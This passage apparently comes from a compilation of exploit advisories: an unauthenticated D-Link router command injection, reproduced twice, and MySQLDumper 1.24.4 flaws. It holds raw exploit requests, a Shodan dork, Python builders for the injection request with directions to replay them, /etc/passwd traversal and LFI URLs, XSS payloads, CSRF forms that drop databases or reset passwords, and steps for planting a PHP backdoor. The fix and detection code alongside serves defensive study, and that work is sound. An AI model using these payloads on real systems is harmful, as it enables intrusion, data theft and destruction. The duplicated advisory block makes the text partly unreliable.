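        raise ValueError("COM payload must fit a 16-bit segment length")
    com = b"\xff" + bytes([COM]) + struct.pack(">H", len(php) + 2) + php
    app0 = (b"\xff" + bytes([APP0]) + struct.pack(">H", 16)
            + b"JFIF\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00")  # JFIF 1.1, 72 dpi, no thumbnail
    return b"\xff\xd8" + com + app0 + b"\xff\xd9"


PHP_OPEN = re.compile(rb"<\?(php\b|=|\s)", re.I)  # <?php, <?= and the short tag "<? "


def find_php_segments(data: bytes):
    """Return [(marker, payload)] for metadata segments holding a PHP open tag."""
    return [(m, p) for m, p in jpeg_segments(data) if PHP_OPEN.search(p)]


SAFE_SET_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def is_safe_smileset(value: str) -> bool:
    """Allowlist for ABBC[Config][smileset]: a bare directory name, nothing else.

    Rejects '../' traversal, absolute paths and the %00 truncation used above,
    which is exactly what abbc.conf.php fails to do before include().
    """
    return SAFE_SET_NAME.fullmatch(value) is not None


if __name__ == "__main__":
    img = build_php_jpeg(b"<?php echo 56789; ?>")
    for marker, payload in find_php_segments(img):
        print(f"PHP in segment 0x{marker:02X}: {payload!r}")
    for candidate in ("default", "../../upload/avatar_1.jpeg\x00"):
        print(f"{candidate!r:40} -> {'ok' if is_safe_smileset(candidate) else 'rejected'}")
```

Pattern-matching metadata for `<?` is a triage aid, not a control: the durable fix for uploads is to re-encode the image server-side (which drops COM/APP segments) and store it outside the web root, and the durable fix for the include is the allowlist, in PHP `preg_match('/^[A-Za-z0-9_-]+$/', $set)` before the path is built, with register_globals off so the value cannot arrive by cookie at all.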


rgod/unb_161p1_incl_xpl.txt ( na)

original url:
http://retrogod.altervista.org/unb_161p1_incl_xpl.html


Remote exploit for an arbitrary file inclusion flaw in Unclassified NewsBoard versions 1.6.1 and below.

Michael Messner/D-Link Remote Command Execution ( na)

Device Name: DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110
Vendor: D-Link

============  Vulnerable Firmware Releases: ============ 

DIR-815 v1.03b02 (unauthenticated command injection)
DIR-645 v1.02 (unauthenticated command injection)
DIR-645 v1.03 (authenticated command injection)
DIR-600 below v2.16b01 (with v2.16b01 D-Link also fixes different vulnerabilities reported in M1ADV2013-003)
DIR-300 revB v2.13b01 (unauthenticated command injection)
DIR-300 revB v2.14b01 (authenticated command injection)
DIR-412 Ver 1.14WWB02 (unauthenticated command injection)
DIR-456U Ver 1.00ONG (unauthenticated command injection)
DIR-110 Ver 1.01 (unauthenticated command injection)

Possible other versions and devices are also affected by this vulnerability.

============ Shodan Dorks ============

Shodan search: Server: Linux, HTTP/1.1, DIR
  => 9300 results

============ Vulnerability Overview: ============ 

* OS Command Injection

The vulnerability is caused by missing input validation of the dst parameter combined with missing session validation; it can be exploited to inject and execute arbitrary shell commands.

WARNING: You do not need to be authenticated to the device to inject and execute commands.
Hint: On several devices, such as the DIR-645, wget is preinstalled, so the injection can fetch and execute a payload of your choice.

  => Parameter: dst

Example Exploit:
POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxxx/
Content-Length: 41
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

act=ping&dst=%26%20COMMAND%26

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/05.04.2013%20-%20Dlink-DIR-645_msf-shell.txt.png

* Information disclosure:

The Server banner makes these devices easy to identify:

Server Banner: Server: Linux, HTTP/1.1, DIR-815
Server Banner: Server: Linux, HTTP/1.1, DIR-645
Server Banner: Server: Linux, HTTP/1.1, DIR-600
Server Banner: Server: Linux, HTTP/1.1, DIR-300
Server Banner: Server: Linux, HTTP/1.1, DIR-412
Server Banner: Server: Linux, HTTP/1.1, DIR-456U
Server Banner: Server: Linux, HTTP/1.1, DIR-110

* Information Disclosure:

Detailed device information, including model name, hardware version, Linux kernel, firmware version, language and MAC addresses, is available over the network.

Request:
http://<IP>/DevInfo.txt or http://<IP>/version.txt (check the page source)

Response to DevInfo.txt:

Firmware External Version: V1.00
Firmware Internal Version: a86b
Model Name: DIR-815
Hardware Version: 
WLAN Domain: xxx
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: xx
WAN MAC: xx
WLAN MAC: xx

These details are available without authentication.
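The injection request, the device fingerprint and the check that was missing, as an added Python example. This is not code from the advisory or from D-Link firmware: the function names, the hostname/IP validation (a stand-in for what diagnostic.php should do before touching a shell) and the detection helper are this example's own, and the HTTP response and DevInfo.txt samples are constructed from the formats shown above, so it runs offline.

```python
"""Added example (not from the advisory): build the diagnostic.php ping injection,
fingerprint a device from its Server banner and DevInfo.txt, and validate dst the
way the firmware should have."""
import ipaddress
import re
from urllib.parse import parse_qs, quote


def build_ping_injection(cmd: str) -> str:
    """Form body for POST /diagnostic.php.

    dst is pasted into a shell command line around ping, so '& cmd&' terminates
    ping's arguments and runs cmd: the advisory's act=ping&dst=%26%20COMMAND%26.
    """
    return "act=ping&dst=" + quote(f"& {cmd}&", safe="")


def build_request(host: str, cmd: str) -> bytes:
    """Raw HTTP/1.1 request with a correct Content-Length; no session is needed
    on the unauthenticated firmware versions listed above."""
    body = build_ping_injection(cmd)
    head = (f"POST /diagnostic.php HTTP/1.1\r\nHost: {host}\r\n"
            "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n")
    return (head + body).encode()


SERVER_BANNER = re.compile(r"^Server:\s*Linux, HTTP/1\.1, (DIR-[0-9A-Za-z]+)\s*$", re.M)


def model_from_headers(raw_headers: str):
    """Model name from the banner the advisory lists, or None if it is not one."""
    m = SERVER_BANNER.search(raw_headers)
    return m.group(1) if m else None


def parse_devinfo(text: str) -> dict:
    """DevInfo.txt / version.txt is one 'Key: Value' per line."""
    info = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            info[key.strip()] = value.strip()
    return info


# --- the check the firmware lacked -----------------------------------------
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME = re.compile(rf"(?=.{{1,253}}$)(?:{LABEL}\.)*{LABEL}")


def is_valid_ping_target(dst: str) -> bool:
    """Accept an IP literal or a DNS hostname and nothing else.

    Shell metacharacters (& ; | ` $ newline ...) never pass, so the injection
    above stops here. Invoking ping with an argv list and no shell is the
    stronger fix; this allowlist is defence in depth on top of that.
    """
    try:
        ipaddress.ip_address(dst)
        return True
    except ValueError:
        return HOSTNAME.fullmatch(dst) is not None


def dst_from_body(body: str) -> str:
    return parse_qs(body, keep_blank_values=True).get("dst", [""])[0]


def is_injection_attempt(body: str) -> bool:
    """Detection view (e.g. over a proxy or WAF log that keeps POST bodies):
    a ping request whose dst is not a host is hostile."""
    params = parse_qs(body, keep_blank_values=True)
    return params.get("act") == ["ping"] and not is_valid_ping_target(dst_from_body(body))


# Constructed samples shaped like the advisory's output (not real captures).
SAMPLE_HEADERS = ("HTTP/1.1 200 OK\r\nServer: Linux, HTTP/1.1, DIR-645\r\n"
                  "Content-Type: text/html\r\n\r\n")
SAMPLE_DEVINFO = ("Firmware External Version: V1.00\nFirmware Internal Version: a86b\n"
                  "Model Name: DIR-815\nHardware Version: \nKernel: 2.6.33.2\n"
                  "Language: en\nLAN MAC: xx\nWAN MAC: xx\n")

if __name__ == "__main__":
    print(build_request("192.0.2.1", "ls /tmp").decode())
    print("model:", model_from_headers(SAMPLE_HEADERS))
    print("devinfo:", parse_devinfo(SAMPLE_DEVINFO))
    for body in ("act=ping&dst=8.8.8.8", build_ping_injection("ls")):
        print(f"{body!r:40} injection={is_injection_attempt(body)}")
```

The Content-Length in the advisory's captured request (41) belongs to the command the author sent; the builder above computes it from the actual body, which matters because the device's httpd reads exactly that many bytes.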

============ Solution ============

DIR-645: Update to firmware v1.04b5
DIR-600: Update to firmware v2.16B01
DIR-300 revB: firmware 2.14B01 fixes the authentication bypass but not the command injection vulnerability.
Other devices: No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============

14.12.2012 - discovered vulnerability in first device
14.12.2012 - contacted D-Link via the web interface http://www.dlink.com/us/en/home-solutions/contact-d-link
20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012 - D-Link responded that they will check the findings
11.01.2013 - requested status update
25.01.2013 - requested status update and updated D-Link with the other vulnerable devices
25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix.
07.02.2013 - after the DIR-600/300 drama D-Link contacted me and now they are talking with me ;)
since 07.02.2013 - Good communication and firmware testing
27.02.2013 - Roberto Paleari releases details about authentication bypass in DIR-645 - http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt
05.04.2013 - vendor releases firmware updates
05.04.2013 - public release

===================== Advisory end =====================


D-Link devices DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110 all suffer from a remote command injection vulnerability.

m-1-k-3/Multiple D-Link Devices - Multiple Vulnerabilities ( hardware)

# Exploit Title: Multiple Vulnerabilities in Dlink devices
# Date: 05.04.2013
# Exploit Author: m-1-k-3
# Vendor Homepage: http://www.dlink.de
# Software Link: http://www.dlink.de/cs/Satellite?c=Product_C&childpagename=DLinkEurope-DE%2FDLProductCarouselSingle&cid=1197391383981&p=1197318958269&packedargs=ProductParentID%3D1197318677527%26category%3DQuickProductFinder%26locale%3D1195806663795%26term%3DDIR-645&pagename=DLinkEurope-DE%2FDLWrapper
# Version: different devices and versions are affected

Device Name: DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110
Vendor: D-Link

============  Vulnerable Firmware Releases: ============ 

DIR-815 v1.03b02 (unauthenticated command injection)
DIR-645 v1.02 (unauthenticated command injection)
DIR-645 v1.03 (authenticated command injection)
DIR-600 below v2.16b01 (with v2.16b01 D-Link also fixes different vulnerabilities reported in M1ADV2013-003)
DIR-300 revB v2.13b01 (unauthenticated command injection)
DIR-300 revB v2.14b01 (authenticated command injection)
DIR-412 Ver 1.14WWB02 (unauthenticated command injection)
DIR-456U Ver 1.00ONG (unauthenticated command injection)
DIR-110 Ver 1.01 (unauthenticated command injection)

Possible other versions and devices are also affected by this vulnerability.

============ Shodan Dorks ============

Shodan search: Server: Linux, HTTP/1.1, DIR
	=> 9300 results
	
============ Vulnerability Overview: ============ 

* OS Command Injection

The vulnerability is caused by missing input validation of the dst parameter combined with missing session validation; it can be exploited to inject and execute arbitrary shell commands.

WARNING: You do not need to be authenticated to the device to inject and execute commands.
Hint: On several devices, such as the DIR-645, wget is preinstalled, so the injection can fetch and execute a payload of your choice.

	=> Parameter: dst

Example Exploit:
POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxxx/
Content-Length: 41
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

act=ping&dst=%26%20COMMAND%26

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/05.04.2013%20-%20Dlink-DIR-645_msf-shell.txt.png

* Information disclosure:

The server banner makes this type of device easy to detect:

Server Banner: Server: Linux, HTTP/1.1, DIR-815
Server Banner: Server: Linux, HTTP/1.1, DIR-645
Server Banner: Server: Linux, HTTP/1.1, DIR-600
Server Banner: Server: Linux, HTTP/1.1, DIR-300
Server Banner: Server: Linux, HTTP/1.1, DIR-412
Server Banner: Server: Linux, HTTP/1.1, DIR-456U
Server Banner: Server: Linux, HTTP/1.1, DIR-110

* Information Disclosure:

Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.

Request:
http://<IP>/DevInfo.txt or http://<IP>/version.txt (check the page source)

Response to DevInfo.txt:

Firmware External Version: V1.00
Firmware Internal Version: a86b
Model Name: DIR-815
Hardware Version: 
WLAN Domain: xxx
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: xx
WAN MAC: xx
WLAN MAC: xx

These details are available without authentication.
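The fingerprinting and injection steps above, put into one small script. This is an added example written for this page, not code from the advisory or from D-Link: the banner regex, the example host, and the sample DevInfo.txt text (copied from the response shown above, placeholders included) are assumptions. It only builds the request; nothing is sent unless you replay the printed output yourself.

```python
import re
from urllib.parse import quote

# Constructed sample: the DevInfo.txt body shown in the advisory, placeholders kept.
SAMPLE_DEVINFO = """Firmware External Version: V1.00
Firmware Internal Version: a86b
Model Name: DIR-815
Hardware Version: 
WLAN Domain: xxx
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: xx
WAN MAC: xx
WLAN MAC: xx
"""

# Assumed pattern for the "Server: Linux, HTTP/1.1, DIR-xxx" banner listed above.
BANNER_RE = re.compile(r'^Linux, HTTP/1\.1, (DIR-[0-9A-Za-z]+)$')


def model_from_banner(server_header):
    """Return the D-Link model advertised in a Server: header value, or None."""
    m = BANNER_RE.match(server_header.strip())
    return m.group(1) if m else None


def parse_devinfo(text):
    """Turn the unauthenticated DevInfo.txt body into a dict of field -> value."""
    info = {}
    for line in text.splitlines():
        if ':' not in line:
            continue
        key, _, value = line.partition(':')
        info[key.strip()] = value.strip()
    return info


def build_ping_body(command):
    """Body for POST /diagnostic.php exactly as in the advisory: act=ping&dst=%26%20<cmd>%26.

    Before URL encoding the dst value is '& <cmd>&', so the shell that runs the
    ping helper backgrounds the ping and runs the injected command as well.
    """
    return 'act=ping&dst=' + quote('& ' + command + '&', safe='')


def build_request(host, command, uid='hfaiGzkB4z'):
    """Raw HTTP/1.1 request in the advisory's shape, with Content-Length computed.

    The uid cookie value is arbitrary: the advisory states the session is not validated.
    """
    body = build_ping_body(command)
    headers = [
        'POST /diagnostic.php HTTP/1.1',
        'Host: ' + host,
        'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
        'Content-Length: %d' % len(body),
        'Cookie: uid=' + uid,
    ]
    return '\r\n'.join(headers) + '\r\n\r\n' + body


if __name__ == '__main__':
    import sys
    host, cmd = (sys.argv[1], sys.argv[2]) if len(sys.argv) == 3 else ('xxxx', 'COMMAND')
    # Print the request so it can be replayed through a proxy or nc; nothing is sent here.
    print(build_request(host, cmd))
```

Run it as `python3 dlink_diag.py <host> '<command>'` and replay the printed request; the Server banner and DevInfo.txt parsers let you confirm the model before touching /diagnostic.php.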

============ Solution ============

DIR-645: Update to firmware v1.04b5
DIR-600: Update to firmware v2.16B01
DIR-300 rev B: firmware 2.14B01 fixes the authentication bypass but not the command injection vulnerability.
Other devices: No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============

14.12.2012 - discovered vulnerability in first device
14.12.2012 - contacted dlink via the webinterface http://www.dlink.com/us/en/home-solutions/contact-d-link
20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012 - D-link responded that they will check the findings
11.01.2013 - requested status update
25.01.2013 - requested status update and updated D-Link with the other vulnerable devices
25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix.
07.02.2013 - after the DIR-600/300 drama D-Link contacted me and now they are talking with me ;)
since 07.02.2013 - Good communication and firmware testing
27.02.2013 - Roberto Paleari releases details about authentication bypass in DIR-645 - http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt
05.04.2013 - vendor releases firmware updates
05.04.2013 - public release

===================== Advisory end =====================

Akastep/MySQLDumper 1.24.4 LFI / XSS / CSRF / Code Execution / Traversal ( na)

================================================================================================
Vulnerable Software: MySQLDumper Version 1.24.4
Downloaded from: http://sourceforge.net/projects/mysqldumper/files/
(MD5 SUM: b62357a0d5bbb43779d16427c30966a1 *MySQLDumper1.24.4.zip)
================================================================================================
About Software:
What is MySQLDumper ?
MySQLDumper is a PHP and Perl based tool for backing up MySQL databases.
You can easily dump your data into a backup file and - if needed - restore it.
It is especially suited for shared hosting webspaces, where you don't have shell access.
MySQLDumper is an open source project and released under the GNU-license.
================================================================================================
Tested on:
php.ini: magic_quotes_gpc = Off
safe_mode = Off
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MySQL: 5.5.23
================================================================================================

Vulnerability description:
MySQLDumper 1.24.4 is prone to local file inclusion (LFI), cross-site scripting (XSS), cross-site request forgery (CSRF),
PHP code execution, directory traversal and information disclosure.

Local File Inclusion
http://192.168.0.15/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00
/* Vulnerable code section
//install.php

if (!@ob_start("ob_gzhandler")) @ob_start();
$install_ftp_server=$install_ftp_user_name=$install_ftp_user_pass=$install_ftp_path="";
$dbhost=$dbuser=$dbpass=$dbport=$dbsocket=$manual_db='';
foreach ($_GET as $getvar=>$getval)
{
  ${$getvar}=$getval;
}
foreach ($_POST as $postvar=>$postval)
{
  ${$postvar}=$postval;
}
include_once ( './inc/functions.php' );
include_once ( './inc/mysql.php' );
include_once ( './inc/runtime.php' );
if (!isset($language)) $language="en";

$config['language']=$language;
include ( './language/lang_list.php' );
include ( 'language/' . $language . '/lang_install.php' );
include ( 'language/' . $language . '/lang_main.php' );
include ( 'language/' . $language . '/lang_config_overview.php' );

*/



XSS on inputs via $_POST
http://192.168.0.15/learn/cubemail/install.php?phase=1&language=en&submit=Installation




http://192.168.0.15/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;
/* Vulnerable code section
//index.php
<?php
if (!@ob_start("ob_gzhandler")) @ob_start();
include ('./inc/functions.php');
$page=(isset($_GET['page'])) ? $_GET['page'] : 'main.php';
if (!file_exists("./work/config/mysqldumper.php"))
{
  header("location: install.php");
  ob_end_flush();
  die();
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
        "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Author" content="Daniel Schlichtholz">
<title>MySQLDumper</title>
</head>

<frameset border=0 cols="190,*">
  <frame name="MySQL_Dumper_menu" src="menu.php" scrolling="no" noresize
    frameborder="0" marginwidth="0" marginheight="0">
  <frame name="MySQL_Dumper_content" src="<?php
  echo $page; // <= $page comes straight from $_GET and is reflected unescaped
  ?>"
    scrolling="auto" frameborder="0" marginwidth="0" marginheight="0">
</frameset>
</html>
<?php
ob_end_flush();



*/




XSS via $_GET
http://192.168.0.15/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation
http://192.168.0.15/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
http://192.168.0.15/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1
http://192.168.0.15/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E


CSRF: delete the application's access protection via $_GET
<img src="http://192.168.0.15/learn/cubemail/main.php?action=deletehtaccess" />

*After this the application is left completely unprotected.*


CSRF Drop database:

<img src="http://localhost/tld/meonyourpc.PNG" height="250" width="300" />
<form name="hackit" id="hackit" action="http://192.168.0.15/learn/cubemail/main.php?action=db&dbid=1" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
</form>

kill0 is always information_schema (which obviously cannot be dropped), so increment the index:
kill1, kill2, etc.



CSRF: uninstall the application via $_GET
http://192.168.0.15/learn/cubemail/install.php?language=en&phase=101
or
http://192.168.0.15/learn/cubemail/install.php?language=en&phase=2  (this deletes the existing config.php file)

CSRF change password:

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://192.168.0.15/learn/cubemail/main.php?action=schutz">
<input name="username" id="username" type="text" value="pwnyou" />
<input name="userpass1" id="userpass1" type="text" value="pwnyou" />
<input name="userpass2" id="userpass2" type="text" value="pwnyou" />
<!--SHA1 (all Systems) -->
<input type="radio" name="type" id="type2" value="2" checked="checked" >
</form>

username:pwnyou
password:pwnyou

CSRF: execute SQL statements via $_GET
e.g. to create a denial-of-service condition:
<img src="http://192.168.0.15/learn/cubemail/sql.php?sql_statement=select+benchmark%28100000000,md5%28now%28%29%29%29--" height="0" width="0" />




After gaining access to the application (e.g. after successfully exploiting the delete-protection CSRF above),
a remote attacker can use the following techniques to upload a backdoor.
As a result the site is completely compromised.
*Upload backdoor:*
Rename your backdoor on your PC to me.php.gz
Then switch to:
http://192.168.0.15/learn/cubemail/filemanagement.php?action=files
Upload it.
Then switch to:
http://192.168.0.15/learn/cubemail/main.php?action=edithtaccess
In the input box called File:
enter the relative/absolute path to your uploaded me.php.gz (default ./work/backup/me.php.gz)
Click the RELOAD button.
In the input box called File: change the file extension to:
./work/backup/me.php
Click the Save button and voila, your backdoor is in place.
You can find it at:
http://192.168.0.15/learn/cubemail/work/backup/me.php


The same technique works without uploading any file:
Switch to
http://192.168.0.15/learn/cubemail/filemanagement.php?action=files

Enter a non-existent file name in the input called File:
e.g.
mybackdoor.php
Click the Reload button.
It will ask *Create it?*
Click the *Create* button.
Paste your backdoor content into the textarea and click the Save button.

The same technique can be used to add a custom .htaccess handler (e.g. to execute the backdoor as a *.gif file).

*NOTE* The second technique can also be used by an attacker to overwrite existing files or read arbitrary files on the site/server.

There is also a chance to execute our code via the PHP eval() language construct.
We have PHP code execution here:

Vulnerable code section:
/*
//menu.php
if (isset($_POST['selected_config'])||isset($_GET['config']))
{
  if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
  // Configuration was switched in content frame?
  if (isset($_GET['config'])) $new_config=$_GET['config'];
  // restore the last active menuitem
  if (is_readable($config['paths']['config'].$new_config.'.php'))
  {
    clearstatcache();
    unset($databases);
    $databases=array();
    if (read_config($new_config))
    {
      $config['config_file']=$new_config;
      $_SESSION['config_file']=$new_config; //$config['config_file'];
      $config_refresh='
      <script language="JavaScript" type="text/javascript">
      if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
      {
        var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
      }
      else selected_div=\'\';
      parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&amp;sel=\'+selected_div</script>';
    }
    if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern
  }
}



*/
As you can see, $new_config comes straight from the request, so it can contain traversal sequences.

Looking at the read_config() function:
//inc/functions_global.php

function read_config($file=false)
{
  global $config,$databases;
  $ret=false;
  if (!$file) $file=$config['config_file'];
  // protect from including external files
  $search=array(':', 'http', 'ftp', ' ');
  $replace=array('', '', '', '');
  $file=str_replace($search,$replace,$file);

  if (is_readable($config['paths']['config'].$file.'.php'))
  {
    // to prevent modern server from caching the new configuration we need to evaluate it this way
    clearstatcache();
    $f=implode('',file($config['paths']['config'].$file.'.php'));
    $f=str_replace('<?php','',$f);
    $f=str_replace('?>','',$f);
    eval($f);
    $config['config_file']=$file;
    $_SESSION['config_file']=$config['config_file'];
    $ret=true;
  }
  return $ret;
}

This means a remote attacker can have an arbitrary file evaluated as PHP (note the eval($f)).

Our exploit:
http://192.168.0.15/learn/cubemail/menu.php?config=../../ss
  where ss = ss.php
# cat ss.php   (e.g. a file the attacker uploaded earlier)
echo 'Our command executed ' . getcwd();
phpinfo();

Print screen:
http://s007.radikal.ru/i302/1204/c3/fd5aac2a58c5.png


There are also many cross-site scripting (XSS) vulnerabilities:
Switch to:
http://192.168.0.15/learn/cubemail/sql.php?db=information_schema&dbid=0

Enter:
select '<script>alert(1);</script>'

and click Execute SQL Statement.


Traversal:
/*Vulnerable Code Section:
//filemanagement.php
<?php
if (isset($_GET['action'])&&$_GET['action']=='dl') $download=true;
include ('./inc/header.php');
include_once ('./language/'.$config['language'].'/lang.php');
include_once ('./language/'.$config['language'].'/lang_filemanagement.php');
include_once ('./language/'.$config['language'].'/lang_config_overview.php');
include_once ('./language/'.$config['language'].'/lang_main.php');
include_once ('./inc/functions_files.php');
include_once ('./inc/functions_sql.php');
$msg='';
$dump=array();
if ($config['auto_delete']==1) $msg=AutoDelete();
get_sql_encodings(); // get possible sql charsets and also get default charset
//0=Datenbank  1=Struktur
$action=(isset($_GET['action'])) ? $_GET['action'] : 'files';
$kind=(isset($_GET['kind'])) ? $_GET['kind'] : 0;
$expand=(isset($_GET['expand'])) ? $_GET['expand'] : -1;
$selectfile=(isset($_POST['selectfile'])) ? $_POST['selectfile'] : "";
$destfile=(isset($_POST['destfile'])) ? $_POST['destfile'] : "";
$compressed=(isset($_POST['compressed'])) ? $_POST['compressed'] : "";
$dk=(isset($_POST['dumpKommentar'])) ? ((get_magic_quotes_gpc()) ? stripslashes($_POST['dumpKommentar']) : $_POST['dumpKommentar']) : "";
$dk=str_replace(':','|',$dk); // remove : because of statusline
$dump['sel_dump_encoding']=(isset($_POST['sel_dump_encoding'])) ? $_POST['sel_dump_encoding'] : get_index($config['mysql_possible_character_sets'],$config['mysql_standard_character_set']);
$dump['dump_encoding']=isset($config['mysql_possible_character_sets'][$dump['sel_dump_encoding']]) ? $config['mysql_possible_character_sets'][$dump['sel_dump_encoding']] : 0;

if ($action=='dl')
{
  // Download of a backup file wanted
  $file='./'.$config['paths']['backup'].urldecode($_GET['f']);
  if (is_readable($file))
  {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: '.(string) filesize($file));
    flush();
    $file=fopen($file,"rb");
    while (!feof($file))
    {
      print fread($file,round(100*1024));
      flush();
    }
    fclose($file);
  }

  //readfile($file);
  exit();
}

*/


Exploit:
http://192.168.0.15/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
http://192.168.0.15/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
This technique can be used by an attacker to download arbitrary files from the site/server.
Print screen:
http://s017.radikal.ru/i431/1204/e2/9075bb5fecd4.png
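The three file-path bugs in this advisory (the $language include in install.php, the $new_config name that read_config() turns into an eval()'d file, and the $_GET['f'] download in filemanagement.php) share one root cause: a user-supplied name is concatenated into a path with no allowlist and no containment check, and the only "protection" is a str_replace of ':', 'http', 'ftp' and ' '. The Python below is an added example written for this page, not MySQLDumper code: it mirrors that filter to show why '../../ss' and '%00' get through, models the pre-PHP-5.3.4 NUL-byte truncation the %00 payloads rely on, and shows the allowlist-plus-containment check a fixed version needs. The scratch directory tree built in demo() is constructed.

```python
import os
import re
import shutil
import tempfile
from urllib.parse import unquote


def legacy_config_target(config_dir, name):
    """Mirror of read_config(): strip ':', 'http', 'ftp', ' ' and append '.php'.

    Nothing removes '../', so the resulting path can point anywhere on disk.
    """
    for bad in (':', 'http', 'ftp', ' '):
        name = name.replace(bad, '')
    return config_dir + name + '.php'


def legacy_download_target(backup_dir, f):
    """Mirror of filemanagement.php?action=dl: './' . backup . urldecode($_GET['f'])."""
    return './' + backup_dir + unquote(f)


def php_pre_534_open_path(path):
    """PHP before 5.3.4 handed the raw C string to the OS, so a NUL byte cut the
    path short. This models that behaviour to show why '%00' drops the '.php' suffix."""
    return path.split('\x00', 1)[0]


# Allowlist for names that are used to build a path: no separators, no dots, no NUL.
SAFE_NAME = re.compile(r'^[A-Za-z0-9_-]{1,64}$')


def hardened_target(base_dir, name, suffix=''):
    """Allowlist the name, then prove the resolved path is still inside base_dir."""
    if '\x00' in name or not SAFE_NAME.match(name):
        raise ValueError('rejected name %r' % name)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name + suffix))
    if os.path.commonpath([base, target]) != base:
        raise ValueError('path escapes %s' % base)
    return target


def demo():
    """Run both versions against a constructed scratch tree; returns a dict of outcomes."""
    root = tempfile.mkdtemp()
    try:
        config_dir = os.path.join(root, 'work', 'config')
        os.makedirs(config_dir)
        with open(os.path.join(config_dir, 'mysqldumper.php'), 'w') as fh:
            fh.write('<?php $config["x"]=1; ?>')
        # The attacker's file sits two directories above work/config, like ss.php above.
        with open(os.path.join(root, 'ss.php'), 'w') as fh:
            fh.write('phpinfo();')

        out = {}
        out['legacy_eval_path'] = legacy_config_target(config_dir + os.sep, '../../ss')
        out['legacy_eval_exists'] = os.path.isfile(out['legacy_eval_path'])
        out['legacy_dl_path'] = php_pre_534_open_path(
            legacy_download_target('work/backup/', '../../../../etc/passwd%00'))

        def attempt(name, suffix):
            try:
                hardened_target(config_dir, name, suffix)
                return 'allowed'
            except ValueError:
                return 'rejected'

        out['hardened_traversal'] = attempt('../../ss', '.php')
        out['hardened_nul'] = attempt('passwd\x00', '.php')
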